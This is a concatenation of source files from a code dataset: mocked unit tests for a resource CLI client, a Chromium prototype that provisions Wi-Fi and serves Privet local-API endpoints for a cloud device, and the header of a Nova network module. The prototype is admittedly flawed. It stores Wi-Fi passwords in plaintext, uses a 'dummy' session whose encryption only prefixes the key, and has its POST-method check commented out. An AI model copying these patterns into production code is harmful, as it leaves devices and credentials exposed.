actual = [instance.serialize() for instance in instances]
expected = json.loads(json.dumps(base.RESOURCES))
self.assertListEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_list_failed(self):
args = self.parser.parse_args(['fakeresource', 'list'])
self.assertRaises(Exception, self.branch.commands['list'].run, args)
@mock.patch.object(
models.ResourceManager, 'get_by_name',
mock.MagicMock(return_value=None))
@mock.patch.object(
models.ResourceManager, 'get_by_id',
mock.MagicMock(return_value=base.FakeResource(**base.RESOURCES[0])))
def test_command_get_by_id(self):
args = self.parser.parse_args(['fakeresource', 'get', '123'])
self.assertEqual(args.func, self.branch.commands['get'].run_and_print)
instance = self.branch.commands['get'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
@mock.patch.object(
models.ResourceManager, 'get_by_name',
mock.MagicMock(return_value=base.FakeResource(**base.RESOURCES[0])))
@mock.patch.object(
models.ResourceManager, 'get_by_id',
mock.MagicMock(return_value=None))
def test_command_get_by_name(self):
args = self.parser.parse_args(['fakeresource', 'get', 'abc'])
self.assertEqual(args.func, self.branch.commands['get'].run_and_print)
instance = self.branch.commands['get'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
def test_command_get(self):
args = self.parser.parse_args(['fakeresource', 'get', 'abc'])
self.assertEqual(args.func, self.branch.commands['get'].run_and_print)
instance = self.branch.commands['get'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse('', 404, 'NOT FOUND')))
def test_command_get_404(self):
args = self.parser.parse_args(['fakeresource', 'get', 'cba'])
self.assertEqual(args.func, self.branch.commands['get'].run_and_print)
self.assertRaises(resource.ResourceNotFoundError,
self.branch.commands['get'].run,
args)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_get_failed(self):
args = self.parser.parse_args(['fakeresource', 'get', 'cba'])
self.assertRaises(Exception, self.branch.commands['get'].run, args)
@mock.patch.object(
httpclient.HTTPClient, 'post',
mock.MagicMock(return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, 'OK')))
def test_command_create(self):
instance = base.FakeResource(name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(['fakeresource', 'create', path])
self.assertEqual(args.func,
self.branch.commands['create'].run_and_print)
instance = self.branch.commands['create'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'post',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_create_failed(self):
instance = base.FakeResource(name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(['fakeresource', 'create', path])
self.assertRaises(Exception,
self.branch.commands['create'].run,
args)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
@mock.patch.object(
httpclient.HTTPClient, 'put',
mock.MagicMock(return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, 'OK')))
def test_command_update(self):
instance = base.FakeResource(id='123', name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(
['fakeresource', 'update', '123', path])
self.assertEqual(args.func,
self.branch.commands['update'].run_and_print)
instance = self.branch.commands['update'].run(args)
actual = instance.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
@mock.patch.object(
httpclient.HTTPClient, 'put',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_update_failed(self):
instance = base.FakeResource(id='123', name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(
['fakeresource', 'update', '123', path])
self.assertRaises(Exception,
self.branch.commands['update'].run,
args)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
def test_command_update_id_mismatch(self):
instance = base.FakeResource(id='789', name='abc')
fd, path = tempfile.mkstemp(suffix='.json')
try:
with open(path, 'a') as f:
f.write(json.dumps(instance.serialize(), indent=4))
args = self.parser.parse_args(
['fakeresource', 'update', '123', path])
self.assertRaises(Exception,
self.branch.commands['update'].run,
args)
finally:
os.close(fd)
os.unlink(path)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
@mock.patch.object(
httpclient.HTTPClient, 'delete',
mock.MagicMock(return_value=base.FakeResponse('', 204, 'NO CONTENT')))
def test_command_delete(self):
args = self.parser.parse_args(['fakeresource', 'delete', 'abc'])
self.assertEqual(args.func,
self.branch.commands['delete'].run_and_print)
self.branch.commands['delete'].run(args)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse('', 404, 'NOT FOUND')))
def test_command_delete_404(self):
args = self.parser.parse_args(['fakeresource', 'delete', 'cba'])
self.assertEqual(args.func,
self.branch.commands['delete'].run_and_print)
self.assertRaises(resource.ResourceNotFoundError,
self.branch.commands['delete'].run,
args)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps([base.RESOURCES[0]]), 200, 'OK')))
@mock.patch.object(
httpclient.HTTPClient, 'delete',
mock.MagicMock(return_value=base.FakeResponse('', 500, 'INTERNAL SERVER ERROR')))
def test_command_delete_failed(self):
args = self.parser.parse_args(['fakeresource', 'delete', 'cba'])
self.assertRaises(Exception, self.branch.commands['delete'].run, args)
|
SaschaMester/delicium | refs/heads/master | components/cloud_devices/tools/prototype/prototype.py | 65 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prototype of cloud device with support of local API.
This prototype has tons of flaws, not the least of which being that it
occasionally will block while waiting for commands to finish. However, this is
a quick sketch.
Script requires following components:
sudo apt-get install python-tornado
sudo apt-get install python-pip
sudo pip install google-api-python-client
sudo pip install ecdsa
"""
import atexit
import base64
import datetime
import json
import os
import random
import subprocess
import time
import traceback
from apiclient.discovery import build_from_document
from apiclient.errors import HttpError
import httplib2
from oauth2client.client import AccessTokenRefreshError
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_OAUTH_SCOPE = 'https://www.googleapis.com/auth/clouddevices'
_CONFIG_FILE = 'config.json'
_API_DISCOVERY_FILE = 'discovery.json'
_DEVICE_STATE_FILE = 'device_state.json'
_DEVICE_SETUP_SSID = 'GCD Prototype %02d..Bcamprv'
_DEVICE_NAME = 'GCD Prototype'
_DEVICE_TYPE = 'vendor'
_DEVICE_PORT = 8080
DEVICE_DRAFT = {
'systemName': 'LEDFlasher',
'deviceKind': 'vendor',
'displayName': _DEVICE_NAME,
'channel': {
'supportedType': 'xmpp'
},
'commandDefs': {
'base': {
# TODO(vitalybuka): find new format for custom commands.
# 'vendorCommands': [{
# 'name': 'flashLED',
# 'parameter': [{
# 'name': 'times',
# 'type': 'string'
# }]
# }]
}
}
}
wpa_supplicant_cmd = 'wpa_supplicant -Dwext -i%s -cwpa_supplicant.conf'
ifconfig_cmd = 'ifconfig %s 192.168.0.3'
hostapd_cmd = 'hostapd hostapd-min.conf'
dhclient_release = 'dhclient -r %s'
dhclient_renew = 'dhclient %s'
dhcpd_cmd = 'udhcpd -f udhcpd.conf'
wpa_supplicant_conf = 'wpa_supplicant.conf'
wpa_supplicant_template = """
network={
ssid="%s"
scan_ssid=1
proto=WPA RSN
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP
psk="%s"
}"""
hostapd_conf = 'hostapd-min.conf'
hostapd_template = """
interface=%s
driver=nl80211
ssid=%s
channel=1
"""
udhcpd_conf = 'udhcpd.conf'
udhcpd_template = """
start 192.168.0.20
end 192.168.0.254
interface %s
"""
class DeviceUnregisteredError(Exception):
pass
def ignore_errors(func):
def inner(*args, **kwargs):
try:
func(*args, **kwargs)
except Exception: # pylint: disable=broad-except
print 'Got error in unsafe function:'
traceback.print_exc()
return inner
class CommandWrapperReal(object):
"""Command wrapper that executs shell commands."""
def __init__(self, cmd):
if type(cmd) in [str, unicode]:
cmd = cmd.split()
self.cmd = cmd
self.cmd_str = ' '.join(cmd)
self.process = None
def start(self):
print 'Start: ', self.cmd_str
if self.process:
self.end()
self.process = subprocess.Popen(self.cmd)
def wait(self):
print 'Wait: ', self.cmd_str
self.process.wait()
def end(self):
print 'End: ', self.cmd_str
if self.process:
self.process.terminate()
class CommandWrapperFake(object):
"""Command wrapper that just prints shell commands."""
def __init__(self, cmd):
self.cmd_str = ' '.join(cmd)
def start(self):
print 'Fake start: ', self.cmd_str
def wait(self):
print 'Fake wait: ', self.cmd_str
def end(self):
print 'Fake end: ', self.cmd_str
class CloudCommandHandlerFake(object):
"""Prints devices commands without execution."""
def __init__(self, ioloop):
pass
def handle_command(self, command_name, args):
if command_name == 'flashLED':
times = 1
if 'times' in args:
times = int(args['times'])
print 'Flashing LED %d times' % times
class CloudCommandHandlerReal(object):
"""Executes device commands."""
def __init__(self, ioloop, led_path):
self.ioloop = ioloop
self.led_path = led_path
def handle_command(self, command_name, args):
if command_name == 'flashLED':
times = 1
if 'times' in args:
times = int(args['times'])
print 'Really flashing LED %d times' % times
self.flash_led(times)
@ignore_errors
def flash_led(self, times):
self.set_led(times*2, True)
def set_led(self, times, value):
"""Set led value."""
if not times:
return
file_trigger = open(os.path.join(self.led_path, 'brightness'), 'w')
if value:
file_trigger.write('1')
else:
file_trigger.write('0')
file_trigger.close()
self.ioloop.add_timeout(datetime.timedelta(milliseconds=500),
lambda: self.set_led(times - 1, not value))
class WifiHandler(object):
"""Base class for wifi handlers."""
class Delegate(object):
def on_wifi_connected(self, unused_token):
"""Token is optional, and all delegates should support it being None."""
raise Exception('Unhandled condition: WiFi connected')
def __init__(self, ioloop, state, config, setup_ssid, delegate):
self.ioloop = ioloop
self.state = state
self.delegate = delegate
self.setup_ssid = setup_ssid
self.interface = config['wireless_interface']
def start(self):
raise Exception('Start not implemented!')
def get_ssid(self):
raise Exception('Get SSID not implemented!')
class WifiHandlerReal(WifiHandler):
"""Real wifi handler.
Note that by using CommandWrapperFake, you can run WifiHandlerReal on fake
devices for testing the wifi-specific logic.
"""
def __init__(self, ioloop, state, config, setup_ssid, delegate):
super(WifiHandlerReal, self).__init__(ioloop, state, config,
setup_ssid, delegate)
if config['simulate_commands']:
self.command_wrapper = CommandWrapperFake
else:
self.command_wrapper = CommandWrapperReal
self.hostapd = self.command_wrapper(hostapd_cmd)
self.wpa_supplicant = self.command_wrapper(
wpa_supplicant_cmd % self.interface)
self.dhcpd = self.command_wrapper(dhcpd_cmd)
def start(self):
if self.state.has_wifi():
self.switch_to_wifi(self.state.ssid(), self.state.password(), None)
else:
self.start_hostapd()
def start_hostapd(self):
hostapd_config = open(hostapd_conf, 'w')
hostapd_config.write(hostapd_template % (self.interface, self.setup_ssid))
hostapd_config.close()
self.hostapd.start()
time.sleep(3)
self.run_command(ifconfig_cmd % self.interface)
self.dhcpd.start()
def switch_to_wifi(self, ssid, passwd, token):
try:
udhcpd_config = open(udhcpd_conf, 'w')
udhcpd_config.write(udhcpd_template % self.interface)
udhcpd_config.close()
wpa_config = open(wpa_supplicant_conf, 'w')
wpa_config.write(wpa_supplicant_template % (ssid, passwd))
wpa_config.close()
self.hostapd.end()
self.dhcpd.end()
self.wpa_supplicant.start()
self.run_command(dhclient_release % self.interface)
self.run_command(dhclient_renew % self.interface)
self.state.set_wifi(ssid, passwd)
self.delegate.on_wifi_connected(token)
except DeviceUnregisteredError:
self.state.reset()
self.wpa_supplicant.end()
self.start_hostapd()
def stop(self):
self.hostapd.end()
self.wpa_supplicant.end()
self.dhcpd.end()
def get_ssid(self):
return self.state.get_ssid()
def run_command(self, cmd):
wrapper = self.command_wrapper(cmd)
wrapper.start()
wrapper.wait()
class WifiHandlerPassthrough(WifiHandler):
"""Passthrough wifi handler."""
def __init__(self, ioloop, state, config, setup_ssid, delegate):
super(WifiHandlerPassthrough, self).__init__(ioloop, state, config,
setup_ssid, delegate)
def start(self):
self.delegate.on_wifi_connected(None)
def switch_to_wifi(self, unused_ssid, unused_passwd, unused_token):
raise Exception('Should not be reached')
def stop(self):
pass
def get_ssid(self):
return 'dummy'
class State(object):
"""Device state."""
def __init__(self):
self.oauth_storage_ = Storage('oauth_creds')
self.clear()
def clear(self):
self.credentials_ = None
self.has_credentials_ = False
self.has_wifi_ = False
self.ssid_ = ''
self.password_ = ''
self.device_id_ = ''
def reset(self):
self.clear()
self.dump()
def dump(self):
"""Saves device state to file."""
json_obj = {
'has_credentials': self.has_credentials_,
'has_wifi': self.has_wifi_,
'ssid': self.ssid_,
'password': self.password_,
'device_id': self.device_id_
}
statefile = open(_DEVICE_STATE_FILE, 'w')
json.dump(json_obj, statefile)
statefile.close()
if self.has_credentials_:
self.oauth_storage_.put(self.credentials_)
def load(self):
if os.path.exists(_DEVICE_STATE_FILE):
statefile = open(_DEVICE_STATE_FILE, 'r')
json_obj = json.load(statefile)
statefile.close()
self.has_credentials_ = json_obj['has_credentials']
self.has_wifi_ = json_obj['has_wifi']
self.ssid_ = json_obj['ssid']
self.password_ = json_obj['password']
self.device_id_ = json_obj['device_id']
if self.has_credentials_:
self.credentials_ = self.oauth_storage_.get()
def set_credentials(self, credentials, device_id):
self.device_id_ = device_id
self.credentials_ = credentials
self.has_credentials_ = True
self.dump()
def set_wifi(self, ssid, password):
self.ssid_ = ssid
self.password_ = password
self.has_wifi_ = True
self.dump()
def has_wifi(self):
return self.has_wifi_
def has_credentials(self):
return self.has_credentials_
def credentials(self):
return self.credentials_
def ssid(self):
return self.ssid_
def password(self):
return self.password_
def device_id(self):
return self.device_id_
class Config(object):
"""Configuration parameters (should not change)"""
def __init__(self):
if not os.path.isfile(_CONFIG_FILE):
config = {
'oauth_client_id': '',
'oauth_secret': '',
'api_key': '',
'wireless_interface': ''
}
config_f = open(_CONFIG_FILE + '.sample', 'w')
config_f.write(json.dumps(credentials, sort_keys=True,
indent=2, separators=(',', ': ')))
config_f.close()
raise Exception('Missing ' + _CONFIG_FILE)
config_f = open(_CONFIG_FILE)
config = json.load(config_f)
config_f.close()
self.config = config
def __getitem__(self, item):
if item in self.config:
return self.config[item]
return None
class MDnsWrapper(object):
"""Handles mDNS requests to device."""
def __init__(self, command_wrapper):
self.command_wrapper = command_wrapper
self.avahi_wrapper = None
self.setup_name = None
self.device_id = ''
self.started = False
def start(self):
self.started = True
self.run_command()
def get_command(self):
"""Return the command to run mDNS daemon."""
cmd = [
'avahi-publish',
'-s', '--subtype=_%s._sub._privet._tcp' % _DEVICE_TYPE,
_DEVICE_NAME, '_privet._tcp', '%s' % _DEVICE_PORT,
'txtvers=3',
'type=%s' % _DEVICE_TYPE,
'ty=%s' % _DEVICE_NAME,
'id=%s' % self.device_id
]
if self.setup_name:
cmd.append('setup_ssid=' + self.setup_name)
return cmd
def run_command(self):
if self.avahi_wrapper:
self.avahi_wrapper.end()
self.avahi_wrapper.wait()
self.avahi_wrapper = self.command_wrapper(self.get_command())
self.avahi_wrapper.start()
def set_id(self, device_id):
self.device_id = device_id
if self.started:
self.run_command()
def set_setup_name(self, setup_name):
self.setup_name = setup_name
if self.started:
self.run_command()
class CloudDevice(object):
"""Handles device registration and commands."""
class Delegate(object):
def on_device_started(self):
raise Exception('Not implemented: Device started')
def on_device_stopped(self):
raise Exception('Not implemented: Device stopped')
def __init__(self, ioloop, state, config, command_wrapper, delegate):
self.state = state
self.http = httplib2.Http()
self.oauth_client_id = config['oauth_client_id']
self.oauth_secret = config['oauth_secret']
self.api_key = config['api_key']
if not os.path.isfile(_API_DISCOVERY_FILE):
raise Exception('Download https://developers.google.com/'
'cloud-devices/v1/discovery.json')
f = open(_API_DISCOVERY_FILE)
discovery = f.read()
f.close()
self.gcd = build_from_document(discovery, developerKey=self.api_key,
http=self.http)
self.ioloop = ioloop
self.active = True
self.device_id = None
self.credentials = None
self.delegate = delegate
self.command_handler = command_wrapper
def try_start(self, token):
"""Tries start or register device."""
if self.state.has_credentials():
self.credentials = self.state.credentials()
self.device_id = self.state.device_id()
self.run_device()
elif token:
self.register(token)
else:
print 'Device not registered and has no credentials.'
print 'Waiting for registration.'
def register(self, token):
"""Register device."""
resource = {
'deviceDraft': DEVICE_DRAFT,
'oauthClientId': self.oauth_client_id
}
self.gcd.registrationTickets().patch(registrationTicketId=token,
body=resource).execute()
final_ticket = self.gcd.registrationTickets().finalize(
registrationTicketId=token).execute()
authorization_code = final_ticket['robotAccountAuthorizationCode']
flow = OAuth2WebServerFlow(self.oauth_client_id, self.oauth_secret,
_OAUTH_SCOPE, redirect_uri='oob')
self.credentials = flow.step2_exchange(authorization_code)
self.device_id = final_ticket['deviceDraft']['id']
self.state.set_credentials(self.credentials, self.device_id)
print 'Registered with device_id ', self.device_id
self.run_device()
def run_device(self):
"""Runs device."""
self.credentials.authorize(self.http)
try:
self.gcd.devices().get(deviceId=self.device_id).execute()
except HttpError, e:
# Pretty good indication the device was deleted
if e.resp.status == 404:
raise DeviceUnregisteredError()
except AccessTokenRefreshError:
raise DeviceUnregisteredError()
self.check_commands()
self.delegate.on_device_started()
def check_commands(self):
"""Checks device commands."""
if not self.active:
return
print 'Checking commands...'
commands = self.gcd.commands().list(deviceId=self.device_id,
state='queued').execute()
if 'commands' in commands:
print 'Found ', len(commands['commands']), ' commands'
vendor_command_name = None
for command in commands['commands']:
try:
if command['name'].startswith('base._'):
vendor_command_name = command['name'][len('base._'):]
if 'parameters' in command:
parameters = command['parameters']
else:
parameters = {}
else:
vendor_command_name = None
except KeyError:
print 'Could not parse vendor command ',
print repr(command)
vendor_command_name = None
if vendor_command_name:
self.command_handler.handle_command(vendor_command_name, parameters)
self.gcd.commands().patch(commandId=command['id'],
body={'state': 'done'}).execute()
else:
print 'Found no commands'
self.ioloop.add_timeout(datetime.timedelta(milliseconds=1000),
self.check_commands)
def stop(self):
self.active = False
def get_device_id(self):
return self.device_id
def get_only(f):
def inner(self, request, response_func, *args):
if request.method != 'GET':
return False
return f(self, request, response_func, *args)
return inner
def post_only(f):
def inner(self, request, response_func, *args):
# if request.method != 'POST':
# return False
return f(self, request, response_func, *args)
return inner
def wifi_provisioning(f):
def inner(self, request, response_func, *args):
if self.on_wifi:
return False
return f(self, request, response_func, *args)
return inner
def post_provisioning(f):
def inner(self, request, response_func, *args):
if not self.on_wifi:
return False
return f(self, request, response_func, *args)
return inner
class WebRequestHandler(WifiHandler.Delegate, CloudDevice.Delegate):
"""Handles HTTP requests."""
class InvalidStepError(Exception):
pass
class InvalidPackageError(Exception):
pass
class EncryptionError(Exception):
pass
class CancelableClosure(object):
"""Allows to cancel callbacks."""
def __init__(self, function):
self.function = function
def __call__(self):
if self.function:
return self.function
return None
def cancel(self):
self.function = None
class DummySession(object):
"""Handles sessions."""
def __init__(self, session_id):
self.session_id = session_id
self.key = None
def do_step(self, step, package):
if step != 0:
raise self.InvalidStepError()
self.key = package
return self.key
def decrypt(self, cyphertext):
return json.loads(cyphertext[len(self.key):])
def encrypt(self, plain_data):
return self.key + json.dumps(plain_data)
def get_session_id(self):
return self.session_id
def get_stype(self):
return 'dummy'
def get_status(self):
return 'complete'
class EmptySession(object):
"""Handles sessions."""
def __init__(self, session_id):
self.session_id = session_id
self.key = None
def do_step(self, step, package):
if step != 0 or package != '':
raise self.InvalidStepError()
return ''
def decrypt(self, cyphertext):
return json.loads(cyphertext)
def encrypt(self, plain_data):
return json.dumps(plain_data)
def get_session_id(self):
return self.session_id
def get_stype(self):
return 'empty'
def get_status(self):
return 'complete'
def __init__(self, ioloop, state):
self.config = Config()
if self.config['on_real_device']:
mdns_wrappers = CommandWrapperReal
wifi_handler = WifiHandlerReal
else:
mdns_wrappers = CommandWrapperReal
wifi_handler = WifiHandlerPassthrough
if self.config['led_path']:
cloud_wrapper = CloudCommandHandlerReal(ioloop,
self.config['led_path'])
self.setup_real(self.config['led_path'])
else:
cloud_wrapper = CloudCommandHandlerFake(ioloop)
self.setup_fake()
self.setup_ssid = _DEVICE_SETUP_SSID % random.randint(0,99)
self.cloud_device = CloudDevice(ioloop, state, self.config,
cloud_wrapper, self)
self.wifi_handler = wifi_handler(ioloop, state, self.config,
self.setup_ssid, self)
self.mdns_wrapper = MDnsWrapper(mdns_wrappers)
self.on_wifi = False
self.registered = False
self.in_session = False
self.ioloop = ioloop
self.handlers = {
'/internal/ping': self.do_ping,
'/privet/info': self.do_info,
'/deprecated/wifi/switch': self.do_wifi_switch,
'/privet/v3/session/handshake': self.do_session_handshake,
'/privet/v3/session/cancel': self.do_session_cancel,
'/privet/v3/session/request': self.do_session_call,
'/privet/v3/setup/start':
self.get_insecure_api_handler(self.do_secure_setup_start),
'/privet/v3/setup/cancel':
self.get_insecure_api_handler(self.do_secure_setup_cancel),
'/privet/v3/setup/status':
self.get_insecure_api_handler(self.do_secure_status),
}
self.current_session = None
self.session_cancel_callback = None
self.session_handlers = {
'dummy': self.DummySession,
'empty': self.EmptySession
}
self.secure_handlers = {
'/privet/v3/setup/start': self.do_secure_setup_start,
'/privet/v3/setup/cancel': self.do_secure_setup_cancel,
'/privet/v3/setup/status': self.do_secure_status
}
@staticmethod
def setup_fake():
print 'Skipping device setup'
@staticmethod
def setup_real(led_path):
file_trigger = open(os.path.join(led_path, 'trigger'), 'w')
file_trigger.write('none')
file_trigger.close()
def start(self):
self.wifi_handler.start()
self.mdns_wrapper.set_setup_name(self.setup_ssid)
self.mdns_wrapper.start()
@get_only
def do_ping(self, unused_request, response_func):
response_func(200, {'pong': True})
return True
@get_only
def do_public_info(self, unused_request, response_func):
info = dict(self.get_common_info().items() + {
'stype': self.session_handlers.keys()}.items())
response_func(200, info)
@get_only
def do_info(self, unused_request, response_func):
specific_info = {
'x-privet-token': 'sample',
'api': sorted(self.handlers.keys())
}
info = dict(self.get_common_info().items() + specific_info.items())
response_func(200, info)
return True
@post_only
@wifi_provisioning
def do_wifi_switch(self, request, response_func):
"""Handles /deprecated/wifi/switch requests."""
data = json.loads(request.body)
try:
ssid = data['ssid']
passw = data['passw']
except KeyError:
print 'Malformed content: ' + repr(data)
response_func(400, {'error': 'invalidParams'})
traceback.print_exc()
return True
response_func(200, {'ssid': ssid})
self.wifi_handler.switch_to_wifi(ssid, passw, None)
# TODO(noamsml): Return to normal wifi after timeout (cancelable)
return True
@post_only
def do_session_handshake(self, request, response_func):
"""Handles /privet/v3/session/handshake requests."""
data = json.loads(request.body)
try:
stype = data['keyExchangeType']
step = data['step']
package = base64.b64decode(data['package'])
if 'sessionID' in data:
session_id = data['sessionID']
else:
session_id = "dummy"
except (KeyError, TypeError):
traceback.print_exc()
print 'Malformed content: ' + repr(data)
response_func(400, {'error': 'invalidParams'})
return True
if self.current_session:
if session_id != self.current_session.get_session_id():
response_func(400, {'error': 'maxSessionsExceeded'})
return True
if stype != self.current_session.get_stype():
response_func(400, {'error': 'unsupportedKeyExchangeType'})
return True
else:
if stype not in self.session_handlers:
response_func(400, {'error': 'unsupportedKeyExchangeType'})
return True
self.current_session = self.session_handlers[stype](session_id)
try:
output_package = self.current_session.do_step(step, package)
except self.InvalidStepError:
response_func(400, {'error': 'invalidStep'})
return True
except self.InvalidPackageError:
response_func(400, {'error': 'invalidPackage'})
return True
return_obj = {
'status': self.current_session.get_status(),
'step': step,
'package': base64.b64encode(output_package),
'sessionID': session_id
}
response_func(200, return_obj)
self.post_session_cancel()
return True
@post_only
def do_session_cancel(self, request, response_func):
"""Handles /privet/v3/session/cancel requests."""
data = json.loads(request.body)
try:
session_id = data['sessionID']
except KeyError:
response_func(400, {'error': 'invalidParams'})
return True
if self.current_session and session_id == self.current_session.session_id:
self.current_session = None
if self.session_cancel_callback:
self.session_cancel_callback.cancel()
response_func(200, {'status': 'cancelled', 'sessionID': session_id})
else:
response_func(400, {'error': 'unknownSession'})
return True
@post_only
def do_session_call(self, request, response_func):
"""Handles /privet/v3/session/call requests."""
try:
session_id = request.headers['X-Privet-SessionID']
except KeyError:
response_func(400, {'error': 'unknownSession'})
return True
if (not self.current_session or
session_id != self.current_session.session_id):
response_func(400, {'error': 'unknownSession'})
return True
try:
decrypted = self.current_session.decrypt(request.body)
except self.EncryptionError:
response_func(400, {'error': 'encryptionError'})
return True
def encrypted_response_func(code, data):
if 'error' in data:
self.encrypted_send_response(request, code, dict(data.items() + {
'api': decrypted['api']
}.items()))
else:
self.encrypted_send_response(request, code, {
'api': decrypted['api'],
'output': data
})
if ('api' not in decrypted or 'input' not in decrypted or
type(decrypted['input']) != dict):
print 'Invalid params in API stage'
encrypted_response_func(200, {'error': 'invalidParams'})
return True
if decrypted['api'] in self.secure_handlers:
self.secure_handlers[decrypted['api']](request,
encrypted_response_func,
decrypted['input'])
else:
encrypted_response_func(200, {'error': 'unknownApi'})
self.post_session_cancel()
return True
def get_insecure_api_handler(self, handler):
def inner(request, func):
return self.insecure_api_handler(request, func, handler)
return inner
@post_only
def insecure_api_handler(self, request, response_func, handler):
real_params = json.loads(request.body) if request.body else {}
handler(request, response_func, real_params)
return True
def do_secure_status(self, unused_request, response_func, unused_params):
"""Handles /privet/v3/setup/status requests."""
setup = {
'registration': {
'required': True
},
'wifi': {
'required': True
}
}
if self.on_wifi:
setup['wifi']['status'] = 'complete'
setup['wifi']['ssid'] = '' # TODO(noamsml): Add SSID to status
else:
setup['wifi']['status'] = 'available'
if self.cloud_device.get_device_id():
setup['registration']['status'] = 'complete'
setup['registration']['id'] = self.cloud_device.get_device_id()
else:
setup['registration']['status'] = 'available'
response_func(200, setup)
def do_secure_setup_start(self, unused_request, response_func, params):
"""Handles /privet/v3/setup/start requests."""
has_wifi = False
token = None
try:
if 'wifi' in params:
has_wifi = True
ssid = params['wifi']['ssid']
passw = params['wifi']['passphrase']
if 'registration' in params:
token = params['registration']['ticketID']
except KeyError:
print 'Invalid params in bootstrap stage'
response_func(400, {'error': 'invalidParams'})
return
try:
if has_wifi:
self.wifi_handler.switch_to_wifi(ssid, passw, token)
elif token:
self.cloud_device.register(token)
else:
response_func(400, {'error': 'invalidParams'})
return
except HttpError as e:
print e # TODO(noamsml): store error message in this case
self.do_secure_status(unused_request, response_func, params)
def do_secure_setup_cancel(self, request, response_func, params):
pass
def handle_request(self, request):
def response_func(code, data):
self.real_send_response(request, code, data)
handled = False
print '[INFO] %s %s' % (request.method, request.path)
if request.path in self.handlers:
handled = self.handlers[request.path](request, response_func)
if not handled:
self.real_send_response(request, 404, {'error': 'notFound'})
def encrypted_send_response(self, request, code, data):
self.raw_send_response(request, code,
self.current_session.encrypt(data))
def real_send_response(self, request, code, data):
data = json.dumps(data, sort_keys=True, indent=2, separators=(',', ': '))
data += '\n'
self.raw_send_response(request, code, data)
def raw_send_response(self, request, code, data):
request.write('HTTP/1.1 %d Maybe OK\n' % code)
request.write('Content-Type: application/json\n')
request.write('Content-Length: %s\n\n' % len(data))
request.write(data)
request.finish()
def device_state(self):
return 'idle'
def get_common_info(self):
return {
'version': '3.0',
'name': 'Sample Device',
'device_state': self.device_state()
}
def post_session_cancel(self):
if self.session_cancel_callback:
self.session_cancel_callback.cancel()
self.session_cancel_callback = self.CancelableClosure(self.session_cancel)
self.ioloop.add_timeout(datetime.timedelta(minutes=2),
self.session_cancel_callback)
def session_cancel(self):
self.current_session = None
# WifiHandler.Delegate implementation
def on_wifi_connected(self, token):
self.mdns_wrapper.set_setup_name(None)
self.cloud_device.try_start(token)
self.on_wifi = True
def on_device_started(self):
self.mdns_wrapper.set_id(self.cloud_device.get_device_id())
def on_device_stopped(self):
pass
def stop(self):
self.wifi_handler.stop()
self.cloud_device.stop()
def main():
state = State()
state.load()
ioloop = IOLoop.instance()
handler = WebRequestHandler(ioloop, state)
handler.start()
def logic_stop():
handler.stop()
atexit.register(logic_stop)
server = HTTPServer(handler.handle_request)
server.listen(_DEVICE_PORT)
ioloop.start()
if __name__ == '__main__':
main()
|
NoBodyCam/TftpPxeBootBareMetal | refs/heads/tftp_pxe_boot | nova/network/manager.py | 1 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
